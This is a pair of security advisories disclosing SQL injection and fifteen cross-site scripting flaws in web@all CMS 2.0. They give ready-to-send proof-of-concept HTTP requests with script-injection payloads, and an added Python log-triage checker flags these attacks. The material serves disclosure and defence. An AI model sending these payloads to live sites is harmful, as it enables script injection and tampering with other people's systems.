
web@all CMS 2.0 Multiple Vulnerabilities and Fixes

web@all CMS 2.0 (_order) SQL Injection Vulnerability

Vendor: web@all
Product web page: http://www.webatall.org
Affected version: 2.0

Summary: web@all is a PHP content management system (CMS). If you
know about it, you nearly can use it to do anything.

Desc: The application suffers from an SQL Injection vulnerability.
Input passed via the GET parameter '_order' is not properly sanitised
before being returned to the user or used in SQL queries. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2012-5099
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5099.php

21.08.2012

---

http://www.2cto.com/webatall/sys/index.php?_key=author&_order=1[SQL ATTACK QUERY]&_text[status]=-1&_type[]=0&mod=article

=============================================================================

web@all CMS 2.0 Multiple Remote XSS Vulnerabilities

Vendor: web@all
Product web page: http://www.webatall.org
Affected version: 2.0

Summary: web@all is a PHP content management system (CMS). If you
know about it, you nearly can use it to do anything.

Desc: web@all CMS suffers from multiple stored and reflected cross-site
scripting vulnerabilities. The issues are triggered when input passed via
several parameters to several scripts is not properly sanitized before being
returned to the user. This can be exploited to execute arbitrary HTML and
script code in a user's browser session in context of an affected site.

----------------------------------------------------------------------------
 * Parameter *          * Method *          * Module *          * Type *
----------------------------------------------------------------------------

  1. act                    POST                member            Reflected
  2. security               POST                member            Reflected
  3. username               POST                member            Reflected
  4. id                     GET                 article           Reflected
  5. mod                    GET/POST            member            Reflected
  6. _flag                  GET                 article           Reflected
  7. _text[]                GET                 article           Reflected
  8. _text[alias]           GET                 article           Reflected
  9. _text[category]        GET                 article           Reflected
 10. _text[email]           GET                 member            Reflected
 11. _text[title]           GET                 article           Reflected
 12. _text[username]        GET                 article           Reflected
 13. _text[timeadd]         GET                 member            Reflected
 14. title                  POST                article/cron      Stored
 15. description            POST                cron              Stored

----------------------------------------------------------------------------

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2012-5098
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5098.php

21.08.2012

---

Reflected:
----------

POST /webatall/sys/action.php HTTP/1.1
Content-Length: 154
Content-Type: application/x-www-form-urlencoded
Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

act=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28900164%29%29%3e&goto=%2fsys&mod=member&password=Password&security=1&submit=Sign%20in&username=Username


POST /webatall/sys/action.php HTTP/1.1
Content-Length: 154
Content-Type: application/x-www-form-urlencoded
Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

act=signin&goto=%2fsys&mod=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28920000%29%29%3e&password=Password&security=1&submit=Sign%20in&username=Username


POST /webatall/sys/action.php HTTP/1.1
Content-Length: 159
Content-Type: application/x-www-form-urlencoded
Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

act=signin&goto=%2fsys&mod=member&password=Password&security=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28964492%29%29%3e&submit=Sign%20in&username=Username


POST /webatall/sys/action.php HTTP/1.1
Content-Length: 147
Content-Type: application/x-www-form-urlencoded
Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

act=signin&goto=%2fsys&mod=member&password=admin&security=1&submit=Sign+in&username=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28913398%29%29%3e


GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=%22%20onmouseover%3dprompt%28940245%29%20bad%3d%22&mod=article
GET /webatall/sys/index.php?_text[timeadd]=1345564800&_type[timeadd]=2&mod=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28961358%29%29%3e
GET /webatall/sys/index.php?_flag=%22%20onmouseover%3dprompt%28916116%29%20bad%3d%22&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article
GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=%22%20onmouseover%3dprompt%28965775%29%20bad%3d%22&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article
GET /webatall/sys/index.php?_text%5balias%5d=%22%20onmouseover%3dprompt%28989568%29%20bad%3d%22&_type%5balias%5d=0&mod=article
GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=%22%20onmouseover%3dprompt%28926119%29%20bad%3d%22&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article
GET /webatall/sys/index.php?_text%5bemail%5d=%22%20onmouseover%3dprompt%28999602%29%20bad%3d%22&_type%5bemail%5d=0&mod=member
GET /webatall/sys/index.php?_text%5btitle%5d=%22%20onmouseover%3dprompt%28927731%29%20bad%3d%22&_type%5btitle%5d=0&mod=article
GET /webatall/sys/index.php?_text%5busername%5d=%22%20onmouseover%3dprompt%28926119%29%20bad%3d%22&_type%5busername%5d=0&mod=member
GET /webatall/sys/index.php?_text[timeadd]=%22%20onmouseover%3dprompt%28929079%29%20bad%3d%22&_type[timeadd]=2&mod=member


Stored:
-------

POST http://www.2cto.com/webatall/sys/action.php HTTP/1.1

act                 sys_add
author              test
category_id         1
content             test
content_key         test
copyright           test
files
id
lang
menu
meta_description    test
meta_keywords       test
mod                 article
options             test
status              1
thumbs              test
title               "><script>alert(1);</script>


POST http://localhost/webatall/sys/action.php HTTP/1.1

act                 sys_add
cron                delete_unpaid_transaction.php
description         "><script>alert(2);</script>
id
menu
mod                 cron
run_interval
status              1
title               "><script>alert(3);</script>
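
Added example (not part of the original advisories, and not web@all code): a Python triage check for access logs that flags requests in which the parameters named in ZSL-2012-5098 and ZSL-2012-5099 carry markup characters, or in which '_order' is not a plain token. The function names, the two patterns and the sample requests are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names come from the advisory text and table above; the patterns are assumptions.
XSS_PARAMS = {"act", "security", "username", "id", "mod", "_flag",
              "_text", "title", "description"}
MARKUP = re.compile(r'[<>"]')               # characters that break out of a tag or attribute
PLAIN_TOKEN = re.compile(r"[A-Za-z0-9_]*")  # assumed shape of a legitimate _order value


def suspicious_params(target, body=""):
    """Return sorted (advisory_id, parameter) findings for one logged request.

    target -- request target with query string, as written in an access log
    body   -- urlencoded POST body, if the logging setup captured it
    """
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    pairs += parse_qsl(body, keep_blank_values=True)
    hits = set()
    for name, value in pairs:              # parse_qsl has percent-decoded both
        base = name.split("[", 1)[0]       # "_text[title]" -> "_text"
        if base == "_order" and not PLAIN_TOKEN.fullmatch(value):
            hits.add(("ZSL-2012-5099", name))
        if base in XSS_PARAMS and MARKUP.search(value):
            hits.add(("ZSL-2012-5098", name))
    return sorted(hits)


# Constructed sample requests with harmless marker values (not from a real log).
SAMPLES = [
    ("/webatall/sys/index.php?_key=title&_order=&mod=article", ""),
    ("/webatall/sys/index.php?_key=author&_order=1%20extra%20tokens&mod=article", ""),
    ("/webatall/sys/index.php?_text%5btitle%5d=%22%20marker%3d%22&mod=article", ""),
    ("/webatall/sys/action.php", "act=signin&mod=member&username=%3Cb%3Emarker%3C%2Fb%3E"),
]


def triage(samples=SAMPLES):
    """Map each flagged request target to its findings; clean requests are left out."""
    return {t: found for t, b in samples if (found := suspicious_params(t, b))}


if __name__ == "__main__":
    for target, findings in triage().items():
        print(target, findings)
```

Article and cron titles or descriptions can legitimately contain quotation marks, so hits on those two stored fields are a signal to review rather than a verdict.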
